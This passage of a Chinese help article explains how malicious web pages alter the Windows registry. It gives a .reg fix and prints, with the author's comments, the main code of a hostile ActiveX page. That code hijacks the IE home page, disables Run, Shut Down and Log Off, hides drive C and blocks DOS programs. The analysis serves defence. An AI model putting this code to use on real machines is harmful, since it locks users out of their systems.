浏览网页注册表被修改之迷及解决办法( 三 )



这是由于注册表HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem下的DWORD值“DisableRegistryTools”被修改为“1”的缘故 , 将其键值恢复为“0”即可恢复注册表的使用 。

解决办法

用记事本程序建立以REG为后缀名的文件 , 将下面这些内容复制在其中就可以了:
REGEDIT4[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]“DisableRegistryTools”=dword:00000000 。

10、浏览网页开始菜单被修改

这是最“狠”的一种 , 让浏览者有生不如死的感觉 。浏览后不仅有类似上面所说的那些症状 , 还会有以下更悲惨的遭遇:

进入该网页会被:
1.修改开始菜单
1)禁止“关闭系统”
2)禁止“运行”
3)禁止“注销”
2.隐藏C盘——你的C盘找不到了
3.禁止使用注册表编辑器regedit
4.禁止使用DOS程序
5.使系统无法进入“实模式”
6.禁止运行任何程序
7.将IE浏览器的首页改为http://www.findfeel.com/ , 收藏夹中也被加入该网址 。
那么这些功能恐怖的功能是如何实现的呢?原来 , 该网页是有人利用Java技术制作的含有有害代码的ActiveX网页文件 。为让更多的人了解其危害 , 我查看了其源代码 , 将其主要部分列了出来 , 并加了详细的注释(文中有“注”字的部分是我加的注释) 。

注:下面代码是将你的IE默认连接首页改为http://www.findfeel.com/
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMain
Start Page", "http://www.findfeel.com/");

注:以下是该网页修改受害者的注册表项所用的招数
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoRun", 01, "REG_BINARY");

注:使受害者系统没有“运行”项 , 这样用户就不能通过注册表编辑器来修改该有害网页对系统注册表的修改 。
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoClose", 01, "REG_BINARY");
注:使受害者系统没有“关闭系统”项

Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoLogOff", 01, "REG_BINARY");

注:使受害者系统没有“注销”项
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesExplorerNoDrives", "00000004", "REG_DWORD");

注:使受害者系统没有逻辑驱动器C
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
PoliciesWinOldApp Disabled","REG_BINARY");

注:禁止运行所有的DOS应用程序;
Shl.RegWrite ("HKCUSoftwareMicrosoftWindowsCurrentVersion
Policies WinOldAppNoRealMode","REG_BINARY");

注:使系统不能启动到“实模式”(传统的DOS模式)下;
又注:进入该网页 , 它还会修改以下的注册表项 , 使WINDOWS系统登录时显示一个登录窗口(在MicroSoft网络用户登录之前)
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersion
WinlogonLegalNoticeCaption", "呜啦啦...");

注:这些代码会使窗口的标题是“呜啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftWindowsCurrentVersion
WinlogonLegalNoticeText", "欢迎你!你这个超级无敌大白痴!《呜啦啦...》故事开始了 , 按确定进入悲惨世界");

注:上面一行是会在窗口中显示出来的文字
注:下面两行代码修改注册表 , 使受害者所有的IE窗口都加上以下的标题:“呜啦啦…”
Shl.RegWrite ("HKLMSoftwareMicrosoftInternet ExplorerMain
Window Title", "呜啦啦...");
Shl.RegWrite ("HKCUSoftwareMicrosoftInternet ExplorerMain
Window Title", "呜啦啦...");

注:到上面一行为止 , 完成了对受害者的注册表的所有修改!

推荐阅读